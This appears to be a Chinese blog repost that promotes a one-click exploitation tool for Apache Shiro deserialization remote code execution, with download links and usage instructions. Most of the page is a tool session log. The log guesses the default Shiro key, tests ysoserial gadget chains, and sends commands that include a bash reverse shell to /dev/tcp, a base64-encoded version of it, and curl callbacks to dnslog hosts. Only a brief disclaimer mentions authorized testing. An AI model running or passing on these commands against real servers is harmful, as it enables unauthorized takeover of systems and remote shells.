Shiro RCE/反序列/命令执行一键利用工具

  • A+
所属分类:javasec_cn
摘要

工具仅供安全自测,未经授权不得非法测试!使用工具请遵守《中华人民共和国网络安全法》。

Shiro RCE/反序列/命令执行一键利用工具

工具仅供安全自测,未经授权不得非法测试!使用工具请遵守《中华人民共和国网络安全法》。


工具来源紫霞仙子
github: https://github.com/wyzxxz/shiro_rce
先知: https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip
javasec: shiro_tool.zip
MD5 (shiro_tool.zip) = e9ec5998907fc94b5fda6c25ca9ec26c
支持操作系统: Windows

2020-05-25:
集成原生ysoserial版本,更稳定,download_url: https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip

java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx nslookup/ping1/ping2/curl nocheck key=kPH+bIxk5D2deZiIxcaaaA== req=1.txt keys=key.txt nslookup/ping1/ping2/curl--> use nslookup dnslog.com check./use ping -c 1 dnslog.com check(default)./use ping -n 1 dnslog.com check./use curl dnslog.com check. nocheck --> skip check target is shiro or not. key= --> set a shiro key. req= --> request body file 抓包保存到文件里,这里写文件名 keys= --> keys file  自定义key的文件,key按行分割,即每行写一个  [[email protected] shiro]java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx/           [-] target: https://xx.xx.xx.xx/ [-] target is use shiro [-] start guess shiro key. [-] shiro key: kPH+bIxk5D2deZiIxcaaaA== [-] check URLDNS [*] find: URLDNS can be use [-] check CommonsBeanutils1 [*] find: CommonsBeanutils1 can be use [-] check CommonsCollections1 [-] check CommonsCollections2 [-] check CommonsCollections3 [-] check CommonsCollections4 [-] check CommonsCollections5 [-] check CommonsCollections6 [-] check CommonsCollections7 [-] check CommonsCollections8 [-] check CommonsCollections9 [-] check CommonsCollections10 [*] find: CommonsCollections10 can be use [-] check Groovy1 [*] find: Groovy1 can be use [-] check JSON1 [*] find: JSON1 can be use [-] check Spring1 [*] find: Spring1 can be use [-] check Spring2 [-] check JRMPClient [*] find: JRMPClient can be use [*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener  0: URLDNS 1: CommonsBeanutils1 2: CommonsCollections10 3: Groovy1 4: JSON1 5: Spring1 6: JRMPClient [-] please enter the number(0-6) 4 [-] use gadget: JSON1 [*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 [*] command example: curl dnslog.xx.com [*] if need base64 command, input should startwith bash=/powershell=/python=/perl=  [-] please enter command, input q or quit to quit > curl json.dnslog.xx.cn [-] start process command: curl json.dnslog.xx.cn [-] please enter command, input q or quit to quit > bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 [-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i} [-] please enter command, input q or quit to quit > quit [-] start process command: quit [-] quit  

相关推荐: Shiro RCE/反序列/命令执行一键利用工具

工具仅供安全自测,未经授权不得非法测试!使用工具请遵守《中华人民共和国网络安全法》。 工具来源紫霞仙子 github: https://github.com/wyzxxz/shiro_rce 先知: https://xz.aliyun.com/forum/up…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: